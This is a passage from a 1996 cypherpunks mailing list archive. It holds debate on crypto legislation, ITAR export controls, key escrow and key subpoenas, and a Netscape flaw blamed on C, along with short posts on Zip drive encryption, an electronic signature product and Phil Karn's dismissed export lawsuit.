To: cypherpunks@toad.com
Subject: Re: RISKS: Princeton discovers another Netscape security flaw
Message-ID: <9603251947.AA0350@smtp1.chipcom.com>
MIME-Version: 1.0
Content-Type: text/plain


ses @ tipper.oit.unc.edu (Simon Spero wrote:
>A pound to a bucket of ferrets this is another visit from our good friends
>Capt. Overrun  and the static buffers, in which case it's more an indictment 
>of C 

So?  I agree that it's essentially impossible to write reliable code
in C, just as in assembly language.  Actually, it's easier in assembly
language because then you KNOW you have to do all the work
yourself, while C misleads you into thinking it does some of the
work for  you when in fact it does not.

That doesn't affect the point at all, though.  

The job of doing something like what Java claims to do correctly
is basically equivalent to the job of creating an A2 grade operating
system.  (Don't bother looking for any, as far as I know the designation
A2 doesn't even exist anymore because it is still beyond the state
of the art.  It means "verified implementation", i.e., the implementation
-- not just the design as in in A1 -- is provably correct.  Note that
a strict interpretation of this would involve holding not just the code
itself but also the tools that act on it -- like compilers, and microcode
in machines that have it -- to A2 standards.  If you wonder why, consider
the famous Unix login hack from many years ago that involved
a hack in the C compiler.)

 paul

!-----------------------------------------------------------------------
! Paul Koning, NI1D, C-24183
! 3Com Corporation, 1-3A, 118 Turnpike Road, Southborough MA 01772 USA
! phone: +1 508 229 1695, fax: +1 508 490 5873
! email: paul_koning@isd.3com.com  or  paul_koning@3mail.3com.com
! Pgp:   27 81 A9 73 A6 0B B3 BE 18 A3 BF DD 1A 59 51 75
!-----------------------------------------------------------------------
! "The only purpose for which power can be rightfully exercised over 
!  any member of a civilized community, against his will, is to prevent
!  harm to others.  His own good, either physical or moral, is not
!  a sufficient warrant."    -- John Stuart Mill, "On Liberty" 1859




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 26 Mar 1996 23:55:54 +0800
To: cypherpunks@toad.com
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <ad7c25ce0402100464ca@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:14 PM 3/25/96, Simon Spero wrote:
>If the Leahy bill is unacceptable, what legistlation is necessary? I
>can't see how the use of cryptography in the commission of a crime needs
>to be a separate offence, but I could see how it could be treated as a
>special circumstance - that doesn't really needed a new law though.

I don't see any compelling need for U.S. legislation. And given the
pressures to attach all sorts of language to bills, I think it best that no
legislation happen.

Consider a few areas in turn:

* DOMESTIC USE OF ENCRYPTION: Currently, no restrictions whatsoever. No
laws saying messages can't be encrypted, no laws saying keys must be
escrowed, no laws about permissable strength of ciphers, no special laws
covering disclosure of keys. Just silence, blessed silence. The
Constitution says there shall be no laws about permissable speech (what
language one speaks in, or writes in), and other provisions about compelled
testimony seem adequate.

* EXPORT OF CRYPTO BEYOND U.S.: This is indeed a thorn in the sides of U.S.
companies, but is not _per se_ an issue I worry about. So long as I have
strong crypto, I don't really care too much about export. It would be nice
to get the ITARs modified, but not at the risk of adding language (such as
Leahy did) making use of encryption a possible crime (we've debated this,
so I won't elaborate here). Besides, I think the best way to overturn the
ITARs is through a court challenge; as I have noted, even the NSA's lawyers
felt that the ITARs would not withstand court scrutiny.

* KEY ESCROW: A matter of contract law, nothing more. If I want to give a
copy of my key to my lawyer, fine. If I want to give a copy to Vince's
Offshore Key Repository, no current U.S. laws stops me from doing so, and I
can even get it to him securely without violating any ITARs by using the
cipher that _he_ uses and then importing it here!

(Michael Froomkin speculated in one of his articles, I don't recall which,
that there might need to be certain guidelines or laws if a key escrow
protocol were to invoke the U.S. court system. Maybe. But I think ordinary
contract law, about what a contract says and what it means, is adequate. If
I pay Joe's Key Warehouse a fee to store my key and it loses it, or gives
it to another party, then damages can be collected.)

IMPORTANT NOTE: It is often said, in a correct interpretation I think, that
a third party holding a key (Joe's Key Warehouse) is _not_ covered by the
5th Amendment's protections against self-incrimination, and so must honor a
subpoena. Sounds accurate to me. However, what if Joe is _also_ one's
lawyer? Does attorney-client privilege apply here? Perhaps. A better
solution is also fully legal at this time: use only offshore key storage. A
U.S. subpoena to Vince's Offshore Key Repository will carry no weight in
Anguilla. (Can I be compelled to ask Vince to send my key? Sure. But Vince
and I could have a stipulation that such "duress requests" will not be
honored, no matter how loudly I squawk.)

* DIGITAL MONEY. Well, this is such a confusing muddle of competing
systems, unclear interpretations, and hyped claims, that I won't address
it. Nor do any of the current bills being considered address it.

In conclusion, things are fine as they are. I see no compelling need to
write a special law confirming the rights we already are enjoying. If the
Congress wants to relax the ITARs (fat chance), they can direct that the
language of specific sections be redrafted. (I'm not even sure when and how
the original language was crafted, though it is part, I believe, of the
ancient Munitions Act and/or Trading with the Enemy Act. The enabling
legislation for the ITARs, and especially for the specific items actually
ON the "Munitions List" could be trivially changed. Were this Leahy's
intent, an easy thing to write a bill for. I doubt this was his intent,
however.

Last point:

>I do feel that it should be possible for courts to sub poena crypto keys,
>but that doesn't really need new law either (4th and 5th ammendments
>become _really_ important though (hmmm- there advantages to writing down a
>constitution after all :)

I agree that subpoenas for keys are legit. While I may dislike giving up my
key, in a criminal matter it seems like "just another document." If they
can subpoena my diary, my phone records, my dentist bills, why not another
this document? Nothing in the Constitution giving it special status.

Still, one can store spare copies of keys with one's lawyer, which _may_
protect it against retrieval by subpoena, and one can store spare copies of
keys in foreign jurisdictions, which almost certainly will protect against
the retrieval (unless an international treaty on such things is passed!).

Obviously things get more complicated when a private key or set of keys "is
one's identity." That is, at some future time, when a key or set of keys is
literally the key to one's identity, then this document is no longer "just
another document." A law enforcement agency or court that obtains these
keys could do much damage, beyond just the matter being investigated or
tried in court. The release of the key cannot be undone. A thorny problem.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 27 Mar 1996 02:40:20 +0800
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: So, what crypto legislation (if any) is necessary? (Was List O' , shame)
In-Reply-To: <Pine.SUN.3.91.960325152219.1146A-100000@polaris.mindport.net>
Message-ID: <199603252030.MAA09782@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> No, in fact, I have not.
> 
> What are the impediments to corporate marketing of crypto where the 
> marketing and distrubting entity is foreign?  (I honestly don't know)

	As a US entity, Community ConneXion is marketing an
SSL-encrypting webserver based on the Apache-SSL developed by the
Apache Group (worldwide) and Ben Laurie (in the UK).
	As both Ben and I would like to maintain a similar product
both for domestic and international use, such that international
corporations may deploy the application worldwide within their
organization without compatibility problems, Ben has to write all the
code, because I can't send him anything. (I've written code to
incorporate new features, but once Ben writes code to incorporate
those features, I will end up using his code, in order to maintain a
stable codebase. -- duplicating effort.)
	As most OS vendors are located within the United States, it
requires a significant effort for an OS vendor to include the product
worldwide, because they need to contract out an outside US cd-pressing
and product build facility in order to build the international version
of their OS (or other application.. right now I'm concentrating on
getting OS vendors to bunlde the prodcut) which bundles our product.

	It's doable. It's not trivial though.

	ITAR does help, in that if Ben decides to commercialize his
product, we have a very convenient line which stops us from competing
with each other. He can't sell inside the US because of RSA patents. I
can't sell outside the US because of ITAR. ;-)

> 
> Granted, worldwide *personal* use of crypto availability is
> > trivial, but not corporate.
> 
> Sufficently entrench personal use of crypto, and the personal/corporate 
> use distinction ceases to exist.

	Not if some applications don't apply to personal use.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Tue, 26 Mar 1996 13:52:19 +0800
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: So, what crypto legislation (if any) is necessary? (Was List O' , shame)
In-Reply-To: <Pine.SUN.3.91.960325153903.1146B-100000@polaris.mindport.net>
Message-ID: <199603252051.MAA09766@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Yes, I concede, there are significant logistical hurdles confronting the 
> multi-jurisdictional crypto project.  One assumes, however, that the 
> initial capital investment will be somewhat offset by the first in market 
> advantage of the position.

	Yes, I would hope so.

> 
> Further, a entirely foreign production, say for chip manufacture, would 
> probably make things easier.  I had specifically contemplated hardware 
> applications.  Indeed, there are problems with both, but they don't stem 
> from ITAR.

	I see, yes.
> 
> Are you talking specific licensing provisions, or implementation.  I 
> don't follow.  (Though I'm fairly sure I'm missing something obvious).

	Well there are certain applications which personal users don't
really want to use. SSL webservers for example. Most individuals don't
have a need for an SSL webserver. RSA-in-hardware is also not needed
for most individuals, but high-traffic server applications which do
RSA operations really should start using RSA in hardware.
	Encrypted database applications (something I'm working on with
a friend) are another application which personal users don't really
care about, but corporate IS finds valuable. (Well, I hope they find
it valuable, otherwise our product won't sell.. the database guy says
he knows them well enough that they'll buy it though.)

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 26 Mar 1996 07:47:29 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: So, what crypto legislation (if any) is necessary? (Was List O' , shame)
In-Reply-To: <Pine.SOL.3.91.960325075557.28271D-100000@chivalry>
Message-ID: <Pine.SUN.3.91.960325132049.26503B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 25 Mar 1996, Simon Spero wrote:

> 
> If the Leahy bill is unacceptable, what legistlation is necessary? I 
> can't see how the use of cryptography in the commission of a crime needs 
> to be a separate offence, but I could see how it could be treated as a 
> special circumstance - that doesn't really needed a new law though.

This kind of legislation would be painfully unenforceable.  How do you 
know if crypto was used in the commission of a crime unless you can offer 
the plaintext to show that the content was criminal or in furtherance of 
a criminal act or conspiracy, >and< that the content was encrypted?

This kind of statute nearly requires escrowed encryption or the old 
standby, stupid crooks.  I'd be happy to see this pass alone because I 
think it would placate some of the screaming crypto-frady-cats on the 
hill much the way the cosmetic assualt "looking" weapons ban did, but I 
think this unlikely.

It's like criminalizing the destruction of bodies in furtherance of 
murder.  What's the point?  Just use obstruction of justice.

> I do feel that it should be possible for courts to sub poena crypto keys, 
> but that doesn't really need new law either (4th and 5th ammendments 
> become _really_ important though (hmmm- there advantages to writing down a 
> constitution after all :)

After doing some work in a somewhat related area (I'm about to release 
the workproduct to the list), I am more and more dubious as to the 
protections the 4th and 5th amendments will provide in these instances.

I think many people on the list here had the right idea generally.  No 
legislation is good legislation for crypto.  Really the ITAR 
applications are beseiged right now, and will probably fizzle out of 
their own accord, not to mention the fact that they are de facto moot.

In practice it is trivial to subvert ITAR for the purposes of 
worldwide crypto availability.

Someone just needs to get a foreign entity producing strong hardware 
encryption in Estonia (hardware IDEA would be nice) to capitalize on the 
markets in the U.S. and non-escrow jurisdictions in Europe and Asia.

If we have no-legislation and a foreign producer of strong crypto soft 
and hardware for the next 3 years, I think we are way ahead of the game.

Unfortunately, I think some version of crypto legislation is going to see 
passage in the next pair of years.  Leahy certainly isn't going to give 
up, and he may have a bit more momentum after an election year runs its 
course.

Whoever wins the election, I think you can expect to see even more 
aggressive bills from congress on the subject.

All it would take is one anti-trust case with encryption as a concealing 
method and people would be busting down doors at night looking for PGP.

> Simon
> 
> ---
> They say in  online country             So which side are you on boys
> There is no middle way                  Which side are you on
> You'll either be a Usenet man           Which side are you on boys
> Or a thug for the CDA                   Which side are you on?
>   National Union of Computer Operatives; Hackers, local 37   APL-CPIO
> 
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 26 Mar 1996 13:45:40 +0800
To: cypherpunks@toad.com
Subject: Re: So, what crypto legislation (if any) is necessary?
In-Reply-To: <ad7c25ce0402100464ca@[205.199.118.202]>
Message-ID: <Pine.SUN.3.92.960325132340.16139A-100000@elaine30.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 25 Mar 1996, Timothy C. May wrote:

[Damn... I can't find anythig I disagree with... oh, how about this]

> Obviously things get more complicated when a private key or set of keys "is
> one's identity." That is, at some future time, when a key or set of keys is
> literally the key to one's identity, then this document is no longer "just
> another document." A law enforcement agency or court that obtains these
> keys could do much damage, beyond just the matter being investigated or
> tried in court. The release of the key cannot be undone. A thorny problem.

IMO this is why maintaining separate keys for identity and encryption, as
is done by both the MS CryptoAPIVapor and Espionage-Enabled Notes, is such
a good idea. The two (or more) keys would sign each other, but they can't
take the place of each other. I sorta wish PGP had this feature. Of course
you can embed comments into your key ID to specify usage, but it's not
quite the same thing.

But anyway, just as a tactical matter, I think getting behind the Leahy
bill, precisely because it had no chance of passing, would have been the
right thing to do (written in past tense because I'm sure it is). The good
guys would have had a better chance to appear reasonable and to get their
views on the record.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 26 Mar 1996 23:53:54 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: So, what crypto legislation (if any) is necessary? (Was List O' , shame)
In-Reply-To: <olJgezi00YUvE7Z68z@andrew.cmu.edu>
Message-ID: <Pine.SUN.3.91.960325133305.26503C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 25 Mar 1996, Declan B. McCullagh wrote:

> Excerpts from mail: 25-Mar-96 So, what crypto legislation.. by Simon
> Spero@tipper.oit.u 
> > If the Leahy bill is unacceptable, what legistlation is necessary? I 
> > can't see how the use of cryptography in the commission of a crime needs 
> > to be a separate offence, but I could see how it could be treated as a 
> > special circumstance - that doesn't really needed a new law though.
> 
> Leahy's bill will not pass. Period. However, with the introduction of
> this legislation comes a chance to get _our side_ heard by the unwired. 

I know I sound like a FUDer, but I really don't think this is going to 
make much difference.  The key is going to be industry and business.

Yell at netscape.  No congressperson is going to listen to whinings 
from the public about the bill of rights in the face of the fanatic 
anti-crime temper of the United States when such an obscure subjection 
as encryption is at issue.

> 
> -Declan
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 26 Mar 1996 14:02:59 +0800
To: tcmay@got.net (Timothy C. May)
Subject: NSA/ITAR
In-Reply-To: <ad7c25ce0402100464ca@[205.199.118.202]>
Message-ID: <199603252143.NAA01149@netcom17.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



TCM:

>* EXPORT OF CRYPTO BEYOND U.S.: This is indeed a thorn in the sides of U.S.
>companies, but is not _per se_ an issue I worry about. So long as I have
>strong crypto, I don't really care too much about export. It would be nice
>to get the ITARs modified, but not at the risk of adding language (such as
>Leahy did) making use of encryption a possible crime (we've debated this,
>so I won't elaborate here). Besides, I think the best way to overturn the
>ITARs is through a court challenge; as I have noted, even the NSA's lawyers
>felt that the ITARs would not withstand court scrutiny.

hmmmm, I don't recall you saying that. would love to hear more about
"NSA's lawyers feeling the ITAR cannot withstand court scrutiny".

I have been ranting at a lot of people in the companies that are showing
no spine and adhering to the odious NSA laws (thereby increasing
their legitimacy) to just SUE THE GOVERNMENT. but of course they
all retort that "gosh, we are just following the laws, we don't
really have any choice, we are doing the best we can, blah blah blah".
(this as they have armies of lawyers that they don't hesitate to 
unleash on their competitors)

frankly I think the lack of a legal challenge to the ITAR crypto laws by
a large company by this date is very suspicious. I am starting to 
wonder if whenever something like this starts to suggest itself,
the NSA agents hurriedly run to a company and make some deals & 
promises. (note I am aware of the Bernstein case-- this is just
too tiny to ever have any significance imho).

if big software companies think the ITAR is not acceptable and is
costing them bigtime, let's see them put their lawyers where their mouths 
are.

I fully agree with the above that the ITAR is unlikely to withstand
a *serious* court challenge, assuming the courts have not gone
totally comatose. the ITAR amounts to the following:
a legitimate law that says, "munitions cannot be exported. the
list of munitions is maintained by the DoJ" (or somebody-or-other).

now, somebody-or-other (obviously the NSA, through their various
front agencies, the @#%^&^*& spooks love this kind of subterfuge
to circumvent the law and pretend they are doing things legitimate)
could add "twinkies" to the list of "export controlled items". 
in fact, I wish they would. they have come pretty darn close.
it turns out that MS has been convinced that mere "export" of 
digital SIGNATURES is prohibited. I can't believe there is not
more uproar here or elsewhere about this outrageousness. 

frankly, I think the american public & software companies
are getting exactly what they
have earned.  "eternal vigilance is the price of freedom". instead
we have endless spinelessness as the response to increasing tyranny.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Mon, 25 Mar 1996 11:48:01 +0800
To: cypherpunks@toad.com
Subject: Re: protection on IoMega ZIP drives
Message-ID: <199603250149.NAA26580@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


Death rays from Mars made alano@teleport.com (Alan Olsen) write:

>At 05:08 AM 3/23/96 +0000, Deranged Mutant wrote:
>>On 23 Mar 96 at 3:00, Ed Carp wrote:
>>
>>> Has anyone tried SFS?  It should work on the zip drive, though I've not
>>> tried it (yet)...
>>
>>If I recall some recent threads on alt.security.pgp (or sci.crypt?),
>>SFS doesn't work on ZIP drives (since ZIPs use the parallel port...).
>>
>>[Or do ZIPs use Scuzzies and the people who had problems were just
>>too lame to figure out that they had to load the driver before SFS?]
>
>There are two versions of the Zip drive.  One is SCSI and one is Parallel
>faking scsi.
>
>The big problem is with the zip drivers.  There is some sort of
>incompatibility between SFS and the zip drivers.  (I hacked on it for a
>couple of hours with no luck.)  

The Zip drives have a firmware bug in that they don't do anything if the
(appropriately-named) FUA bit is set in SCSI requests, and then return a
command complete status.  SFS 1.20 has a workaround for this problem.  It
works with both SCSI and parallel-port versions.  Before anyone asks
when it's due out, its the end of February, probably about the 60th of the
month.

Peter.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CA20007@aol.com
Date: Tue, 26 Mar 1996 08:41:54 +0800
To: cypherpunks@toad.com
Subject: signature appl tested by IRS / PR today
Message-ID: <960325141609_454384469@emout08.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Today, on Monday, March 25th, in New York, a British company, Peripheral
Vision Ltd., is demonstrating their technology for recording signatures
electronically.

The company is also launching a subsidiary called PenOp Inc. today.

Their product is a plug-in for Netscape.

users use a wacom board or its equivalent for writing actual signatures.

IRS is testing the system for verifying signatures at a number of test sites.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karn <karn@qualcomm.com>
Date: Tue, 26 Mar 1996 10:57:18 +0800
To: cypherpunks@toad.com
Subject: Bad news from Judge Richey
Message-ID: <199603252221.OAA24684@servo.qualcomm.com>
MIME-Version: 1.0
Content-Type: text/plain


Last Friday, Judge Richey issued a 36-page opinion dismissing my suit
against the State Dept.

I am waiting for a copy of the opinion, which should arrive in paper
form tomorrow. I'll post it on my web site when it's available in
electronic form. (http://www.qualcomm.com/people/pkarn/export)

I'll be meeting my attorneys next Monday to plan an appeal strategy.

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Alan B. Clegg" <abc@gateway.com>
Date: Tue, 26 Mar 1996 22:17:45 +0800
To: xconq@gangland.gateway.com
Subject: Mailing lists down for 48hrs, now coming back up.
Message-ID: <Pine.BSI.3.91.960325142608.27607A-100000@black-ice.gateway.com>
MIME-Version: 1.0
Content-Type: text/plain


The bsdi-isps, bsdi-users, bsdi-users-d, xconq, humor, cheapnet, and
cypherpunks-d mailing lists have been down since Saturday night at about
8:00pm Eastern. 

The systems handling these mailing lists are now trying to get out from 
under the load, and normal operation should resume within 24 hours (I hope).

(The primary mail machine for gateway.com is currently running at a load 
average of 19.8 and still puffing)

-abc
                                      \             Alan B. Clegg
         Just because I can            \         Network Technologist
        does not mean I will.           \          gateway.com, inc.
                                         \     <http://www.gateway.com/>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 27 Mar 1996 02:33:59 +0800
To: sameer <sameer@c2.org>
Subject: Re: So, what crypto legislation (if any) is necessary? (Was List O' , shame)
In-Reply-To: <199603251937.LAA03810@infinity.c2.org>
Message-ID: <Pine.SUN.3.91.960325152219.1146A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 25 Mar 1996, sameer wrote:

> > I think many people on the list here had the right idea generally.  No 
> > legislation is good legislation for crypto.  Really the ITAR 
> > applications are beseiged right now, and will probably fizzle out of 
> > their own accord, not to mention the fact that they are de facto moot.
> > 
> > In practice it is trivial to subvert ITAR for the purposes of 
> > worldwide crypto availability.
> 
> 	You've obviously never brought a crypto product to market
> before.  

No, in fact, I have not.

What are the impediments to corporate marketing of crypto where the 
marketing and distrubting entity is foreign?  (I honestly don't know)

Granted, worldwide *personal* use of crypto availability is
> trivial, but not corporate.

Sufficently entrench personal use of crypto, and the personal/corporate 
use distinction ceases to exist.

> -- 
> Sameer Parekh					Voice:   510-601-9777x3
> Community ConneXion, Inc.			FAX:     510-601-9734
> The Internet Privacy Provider			Dialin:  510-658-6376
> http://www.c2.org/ (or login as "guest")		sameer@c2.org
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Tue, 26 Mar 1996 13:18:37 +0800
To: Paul_Koning/US/3Com%3COM@smtp1.isd.3com.com
Subject: Re: RISKS: Princeton discovers another Netscape security flaw
In-Reply-To: <9603251947.AA0350@smtp1.chipcom.com>
Message-ID: <Pine.3.89.9603251548.A18052-0100000@netcom7>
MIME-Version: 1.0
Content-Type: text/plain




On 25 Mar 1996 Paul_Koning/US/3Com%3COM@smtp1.isd.3com.com wrote:

> ses @ tipper.oit.unc.edu (Simon Spero wrote:
> >A pound to a bucket of ferrets this is another visit from our good friends
> >Capt. Overrun  and the static buffers, in which case it's more an indictment 
> >of C 
> 
> So?  I agree that it's essentially impossible to write reliable code
> in C, just as in assembly language.  Actually, it's easier in assembly
> language because then you KNOW you have to do all the work
> yourself, while C misleads you into thinking it does some of the
> work for  you when in fact it does not.

Well, what would you suggest then ? Some mental masturbation like C++ ?
<end religious jab> :-)

I have found over the years, that C, just like anything other language, 
has it's quirks and foibles. malloc() calloc() alloc() and realloc() are 
known problems that go way back to the early days on the DEC; not to 
mention odd sized structure members can cause phase errors during 
compilation that never show until runtime.

> 
> That doesn't affect the point at all, though.  
> 
> The job of doing something like what Java claims to do correctly
> is basically equivalent to the job of creating an A2 grade operating
> system.  (Don't bother looking for any, as far as I know the designation
> A2 doesn't even exist anymore because it is still beyond the state
> of the art.  It means "verified implementation", i.e., the implementation
> -- not just the design as in in A1 -- is provably correct.  Note that
> a strict interpretation of this would involve holding not just the code
> itself but also the tools that act on it -- like compilers, and microcode
> in machines that have it -- to A2 standards.  If you wonder why, consider
> the famous Unix login hack from many years ago that involved
> a hack in the C compiler.)
> 
>  paul
> 

I will agree with you here. What I mildly take issue with is that the C 
compiler shoulders the blame for faults that lie in the libraries and OS 
 - just to start pointing fingers. DOS is famous for it's lack of system 
integrity when it comes to file and memory management - yet the standard 
library can do no more than what the target OS allows to take place. 
Thus the language get's blamed for shortcommings in an environment. Also, 
consider that many applications these days are built using third part 
support.

Now we have the added dimension of someone else's code on top of our own, 
plus the compiler, plus the libraries, plus the OS. It's not a pretty 
picture, especially since we trust "packaged goods" too much.

C itself is only composed of some 28 keywords, plus some extensions and a 
simple grammer. I personally will trust the the compiler first before I 
would trust the libraries linked, just based upon the simplicity of the 
language - failing some glaring error in the parser.

> !-----------------------------------------------------------------------
> ! Paul Koning, NI1D, C-24183
> ! 3Com Corporation, 1-3A, 118 Turnpike Road, Southborough MA 01772 USA
> ! phone: +1 508 229 1695, fax: +1 508 490 5873
> ! email: paul_koning@isd.3com.com  or  paul_koning@3mail.3com.com
> ! Pgp:   27 81 A9 73 A6 0B B3 BE 18 A3 BF DD 1A 59 51 75
> !-----------------------------------------------------------------------
> ! "The only purpose for which power can be rightfully exercised over 
> !  any member of a civilized community, against his will, is to prevent
> !  harm to others.  His own good, either physical or moral, is not
> !  a sufficient warrant."    -- John Stuart Mill, "On Liberty" 1859
> 


...Paul

-------------------------------------------------------------------------

"Faced with the choice between changing one's mind and proving that there
 is no need to do so, almost everybody gets busy on the proof"

                                            -- John Kenneth Galbraith

"Success is attending a funeral as a spectator"

                                            -- E. BonAnno 

-------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 26 Mar 1996 14:00:15 +0800
To: sameer <sameer@c2.org>
Subject: Re: So, what crypto legislation (if any) is necessary? (Was List O' , shame)
In-Reply-To: <199603252030.MAA09782@infinity.c2.org>
Message-ID: <Pine.SUN.3.91.960325153903.1146B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 25 Mar 1996, sameer wrote:

> > 
> > No, in fact, I have not.
> > 
> > What are the impediments to corporate marketing of crypto where the 
> > marketing and distrubting entity is foreign?  (I honestly don't know)
> 
> 	As a US entity, Community ConneXion is marketing an
> SSL-encrypting webserver based on the Apache-SSL developed by the
> Apache Group (worldwide) and Ben Laurie (in the UK).

[Legitimate logistical obsticles deleted]

> 	It's doable. It's not trivial though.

Phew.  I thought for a moment you meant legal problems.

Yes, I concede, there are significant logistical hurdles confronting the 
multi-jurisdictional crypto project.  One assumes, however, that the 
initial capital investment will be somewhat offset by the first in market 
advantage of the position.

Further, a entirely foreign production, say for chip manufacture, would 
probably make things easier.  I had specifically contemplated hardware 
applications.  Indeed, there are problems with both, but they don't stem 
from ITAR.

> 	ITAR does help, in that if Ben decides to commercialize his
> product, we have a very convenient line which stops us from competing
> with each other. He can't sell inside the US because of RSA patents. I
> can't sell outside the US because of ITAR. ;-)
> > 
> > Granted, worldwide *personal* use of crypto availability is
> > > trivial, but not corporate.
> > 
> > Sufficently entrench personal use of crypto, and the personal/corporate 
> > use distinction ceases to exist.
> 
> 	Not if some applications don't apply to personal use.

Are you talking specific licensing provisions, or implementation.  I 
don't follow.  (Though I'm fairly sure I'm missing something obvious).

> 
> -- 
> Sameer Parekh					Voice:   510-601-9777x3
> Community ConneXion, Inc.			FAX:     510-601-9734
> The Internet Privacy Provider			Dialin:  510-658-6376
> http://www.c2.org/ (or login as "guest")		sameer@c2.org
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Tue, 26 Mar 1996 12:16:45 +0800
To: cypherpunks@toad.com
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <199603252350.PAA08751@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:23 PM 3/25/96 -0800, Timothy C. May wrote:
>Obviously things get more complicated when a private key or set of keys "is
>one's identity." That is, at some future time, when a key or set of keys is
>literally the key to one's identity, then this document is no longer "just
>another document." A law enforcement agency or court that obtains these
>keys could do much damage, beyond just the matter being investigated or
>tried in court. The release of the key cannot be undone. A thorny problem.

This is precisely the problem Certificate Revocation Lists and Certificate
Expiration Dates address.  There seems very little reason to subpoena a
persons signing key, only decryption keys.  If future software uses
separate keys for these two functions, then there may be minimal danger. 
(With PGP, it should be sufficient to provide the IDEA keys for the
messages in question, leaving the secret key still secret.)

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Tue, 26 Mar 1996 04:58:10 +0800
To: cypherpunks@toad.com
Subject: signing && emacs?
Message-ID: <19960325162536.21380.qmail@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone considered adding a PGP signature to emacs local ``eval''
or hook variables?  It'd sure be nice to have Emacs just load up a
file without asking me if I trust the author.

-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 voice | If you would seek peace, 
Potsdam, NY 13676 | +1 315 268 9201 FAX   | first seek freedom




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
